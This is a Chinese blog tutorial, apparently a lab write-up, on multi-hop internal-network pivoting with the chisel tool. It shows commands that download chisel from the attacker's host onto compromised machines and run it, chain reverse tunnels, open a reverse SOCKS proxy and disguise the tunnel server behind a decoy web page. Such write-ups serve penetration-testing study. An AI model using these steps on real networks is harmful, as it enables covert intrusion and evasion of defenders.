内网渗透-使用chisel端口转发并添加 socks5 认证

最新推荐文章于 2024-04-30 10:40:21 发布
最新推荐文章于 2024-04-30 10:40:21 发布
阅读量1k 收藏 18
点赞数 19
文章标签: 信息安全 网络安全 工具开发 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/136349157
版权

本文主要介绍 chisel 工具使用一个小技巧和添加 socks5 认证

测试环境为 VMware 虚拟机
网卡设置如下

使用到的虚拟机如下,web01-03 使用双网卡配置。
使用 Kali 作为攻击者,四个 Ubuntu 作为受害者,最终的目的是访问 30.129:443 端口。

Kali 
192.168.99.128 (假设为互联网ip)

web01
192.168.99.129
10.10.10.128

web02
10.10.10.129
10.10.20.128

web03
10.10.20.129
10.10.30.128

web04
10.10.30.129

内网渗透端口转发之 chisel 使用

在 chisel 中有一个非常好用的参数 --backend。参数介绍如下

--backend, Specifies another HTTP server to proxy requests to when
    chisel receives a normal HTTP request. Useful for hiding chisel in
    plain sight.

这个参数可以指定另一个正常的 http 服务器作为代理,可以用来隐藏 chisel 服务器。效果如下:

命令如下:
写入一串测试字符到index.html的文件中,用于创建一个简单的网页。

$ echo "<h1>Chisel</h1>" > index.html

$ ls
chisel  index.html

接着使用Python内置的http.server模块启动一个HTTP服务器,监听端口80。

$ python -m http.server 80

使用 chisel 启动服务器,创建一个隧道和代理。指定 chisel 服务器监听端口1337,并将传入的连接转发到位于192.168.99.137上的HTTP服务器(本机,也可以是任意url)。

$ ./chisel server -p 1337 --backend http://192.168.99.137 --reverse

这样的话可以自制一个正常页面,并且也可以用于托管工具。

多层转发演示

Kali

$ ./chisel server -p 1337 --backend http://192.168.99.137 --reverse

Web01
使用 backend 参数后,就可以在服务端口来下载工具,可以做一些适当的更改(使用 nginx,而不是 python)。

# 下载工具并加执行权限
curl 192.168.99.136:1337/chisel -o chisel
chmod +x chisel

# 启动服务,用于连接下层主机
./chisel server -p 1337 --backend http://192.168.99.136:1337 --reverse

# 将 10.128的 1443 转发到 上层主机 1443 端口(本地监听)
./chisel client 192.168.99.136:1337 R:127.0.0.1:1443:10.10.10.128:1443

Web02

# 下载工具并加执行权限
curl 10.10.10.129:1337/chisel -o chisel
chmod +x chisel

# 启动服务,用于连接下层主机
./chisel server -p 1337 --backend http://10.10.10.129:1337 --reverse

Web03

# 下载工具并加执行权限
curl 10.10.20.130:1337/chisel -o chisel	
chmod +x chisel

# 将远程 30.128主机的 443 转发到 上层主机 1443 端口
./chisel client 10.10.20.130:1337 R:1443:10.10.30.128:443

在 Web04 上日志如下

再多一层

Kali

$ echo "<h1>Chisel</h1>" > index.html
$ python -m http.server 80
$ ./chisel server -p 1337 --backend http://192.168.99.137 --reverse 

Kali 
192.168.99.136

web01
./chisel server -p 1337 --backend http://192.168.99.136:1337 --reverse
./chisel client 10.10.10.129:1337 R:1443:1443
192.168.99.144
10.10.10.129

web02
./chisel server -p 1337 --backend http://10.10.10.129:1337 --reverse
./chisel client 10.10.10.129:1337 R:1443:1443
10.10.10.128
10.10.20.130

web03
./chisel server -p 1337 --backend http://10.10.20.130:1337 --reverse
./chisel client 10.10.20.130:1337 R:1443:1443
10.10.20.129
10.10.30.129

web04
/chisel client 10.10.30.129:1337 R:1443:10.10.40.129:443
10.10.30.128
10.10.40.130

Web01

Web02

Web03

Web04

Web05

socks 代理

同样的也可以做 socks 代理

只需要将终点的命令改为 ./chisel client 10.10.20.130:1337 R:0.0.0.0:1443:socks

此时是没有 socks 认证的不太安全。
但 chisel 中已有一个拉去请求,没被作者合并
https://github.com/jpillora/chisel/pull/258/files#diff-1c7b519633cdf38b37f96f2a61e7895a468d5a1ca2e07cb2be1df6981833f462

下载源码,增加上面的请求的代码。编译后得到一个有认证功能的 chisel。
下面是测试命令
Kali

./chisel server -p 13371 --backend http://192.168.99.137 --reverse

Web02

./chisel_auth client --socks5-auth=admin:pwda 192.168.99.136:13371 R:1999:socks

最终结果,可以看到只有密码正确才可以请求到

赛博雨天
关注
  • 19
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队内网攻防渗透:内网渗透之内网对抗:隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线
HACKONE的博客
06-21 569
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)建立客户端连接服务端后将141上5555给到服务端6666上。服务端启动:frps -c frps.ini。
riscv-self:Chisel 3的mini risc-v内核
05-14
自我我自己的项目lihanyuan( )安装git clone --recursive https://github.com/WindProphet/riscv-self先决条件Java8的sbt python3用法 # build every part to verilog and firrtlmake compile# test allmake test#...
socks代理工具chisel使用
weixin_43093631的博客
06-27 2677
chisel同ew相似但是更稳定 下载地址:https://github.com/jpillora/chisel/releases kali使用的:chisel_1.7.6_linux_amd64.gz win7使用的:chisel_1.7.6_windows_amd64 环境win7:192.168.189.129 kali :192.168.189.130 上传chisel.exe到win7上然后启动:start /b chisel.exe server -p 1090 --sock..
[HACK学习呀] - 2021-01-30 内网渗透Chisel内网穿透工具1
08-03
一、chisel工具介绍 二、chisel工具下载使用 三、chisel隧道搭建
内网端口转发代理
最新发布
xiaolan458的专栏
04-30 966
内网端口转发代理
Chisel Tutorial(六)——端口
leishangwen的专栏
08-17 2147
端口就是硬件单元对外的接口,需要指明方向(输入还是输出)。INPUT、OUTPUT指定方向,后面指出宽度,对于Bool类型,其宽度就是1,所以不需要明确指出。
http隧道Chisel
lxyoucan的博客
07-08 1678
http隧道有啥用呢? 有些服务器封端口或者封协议只能走http协议。远程维护机器很不方便,可能要VPN+堡垒机,甚至还有限制了ssh客户端的。这里我就会考虑使用http隧道的方式。 同类文章推荐: 《http隧道Neo-reGeorg使用笔记》https://blog.csdn.net/lxyoucan/article/details/118120656 《钉钉内网穿透》 https://blog.csdn.net/lxyoucan/article/details/112548798 简介 项目地址
chisel-heroku:将凿子作为SOCKS5代理部署到Heroku
05-05
凿子heroku 将作为代理部署到 。 入门 使用这个按钮 或手动创建一个Heroku应用程序: $ heroku create $ heroku stack:set container $ heroku config:set CHISEL_AUTH=user:pass $ git push heroku main ... remote: Verifying deploy... done. To https://git.heroku.com/shrouded-springs-35880.git * [new branch] main -> main 连接您的凿子客户端: $ chisel --version 1.7.6 $ chisel client --keepalive 10s --auth user:pass https://shrouded-springs-35
ansible-role-chisel:部署https的Ansible角色
05-02
主要思想是使用它轻松地实现一个保管箱方案的自动化,以确保客户端始终回叫而不管网络问题,重新启动或程序崩溃,同时还利用了凿子可以提供的基于SSH或VPN的解决方案。 要求 没有任何。 变数 defaults/main.yml ...
20200715-Intro-to-Chisel-FIRRTL-HCF.pdf
12-16
Chisel 代码块通常以 Scala 语言的语法结构编写,使用 import 语句引入 Chisel 库。Chisel 代码块的主要组件包括 Module、IO 束、信号、寄存器和逻辑门等。 在 Chisel 代码块中,Module 是基本的组件单元,用于描述...
使用Chisel来突破公司代理服务器的封锁
^_^
09-29 3913
环境很简单,内网的机器不能直接上外网,必须通过代理服务器。代理服务器设置了各种规则,封了外网的各种邮箱,等等。为了突破封锁,试验了各种方法,最终发现比较好的方法,记录如下。 # 首先尝试XXXAgent, XXXProxy 因为代理服务器可以访问Google,自然而然想到了这个,因为他们都是基于GAE的。但是部分网站的证书总是有些问题。当然大部分网站是没有问题的。 # 接着尝试了Chisel
【Try Hack Me】内网专项---Wreath
人间体佐菲的博客
11-17 550
【Try Hack Me】内网专项---Wreath
Chisel:一款基于HTTP的快速稳定TCPUDP隧道工具_tcp转udp隧道工具
04-17 1248
该项目包目前由Fedora社区进行维护,如果你遇到了关于RPM使用的问题,可以使用这个问题跟踪工具【https://bugzilla.redhat.com/buglist.cgi?在内部,这是使用SSH提供的密码验证方法实现的。点击【http://blog.gopheracademy.com/go-and-ssh/】了解更多关于SSH加密的信息。这个Demo应用程序还会运行一个简单的文件服务器(端口为:3000),由于Heroku防火墙的存在,我们是无法直接访问它的。客户端使用指数回退自动重新连接;
端口转发&&映射详解、代理&&反向代理深入认知
NZXHJ的博客
08-01 7598
端口转发&映射详解、代理&&反向代理深入认知
服务器实现端口转发的N种方式
xuxian的博客
07-05 1977
在一些实际的场景里,我们需要通过利用一些端口转发工具,比如系统自带的命令行工具或第三方小软件,来绕过网络访问限制触及目标系统。下文为大家总结了linux系统和windows系统端口转发常用的一些方法。
vmware走主机代理
h609790462的博客
07-22 1789
vmware
虚拟机使用宿主机全局代理
5L2g556F5ZWl77yf
07-04 1万+
1. 配置主机代理 2. 虚拟机配置 虚拟机按桥接或者NAT按理论来说都是可以的 安装 proxychains4 代管代理设置 $ git clone https://github.com/rofl0r/proxychains-ng.git $ yum install -y gcc automake autoconf libtool make $ cd proxychains-ng $ ./configure $ make && sudo make install $ cp ./src/
VMware虚拟机走主机代理
热门推荐
Qrpucp的博客
05-06 7万+
说明 很多时候我们在主机上完成了代理的配置,为了我们在虚拟机上能够方便的进行研究,我们想让虚拟机也走代理。 原理大概是让虚拟机和主机处于同一个局域网中,将虚拟机中的流量转发到主机上,这时主机的代理软 件监听到局域网内的请求,就会把流量再转发到代理服务器中,实现科学地上网。(解释的可能不严谨) 为了这一目标,我们需要在主机和虚拟机上进行一系列的配置,作者虚拟机中的系统是ubuntu,主机中的系统是w...
chisel3端口怎么输入Int型数据
05-11
Chisel3中的端口类型有多种,包括UInt、SInt、Bool、Vec等。如果要输入Int型数据,可以使用SInt类型的端口。 以下是一个简单的例子,展示了如何在Chisel3中定义一个SInt类型的输入端口: ```scala import chisel3._ class MyModule extends Module { val io = IO(new Bundle { val myInput = Input(SInt(32.W)) }) // ... } ``` 在上面的代码中,我们定义了一个名为MyModule的模块,其中包含一个名为myInput的SInt类型的输入端口。端口的宽度为32位,可以根据需要进行调整。 使用时,可以将Int类型的数据赋值给端口: ```scala val myModuleInstance = Module(new MyModule) myModuleInstance.io.myInput := 42.U ``` 在上面的代码中,我们创建了一个MyModule的实例myModuleInstance,并将整数42赋值给其输入端口myInput。需要注意的是,输入数据应该使用UInt或SInt类型,并使用.U或.S后缀将其转换为Chisel3中的无符号或有符号整数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值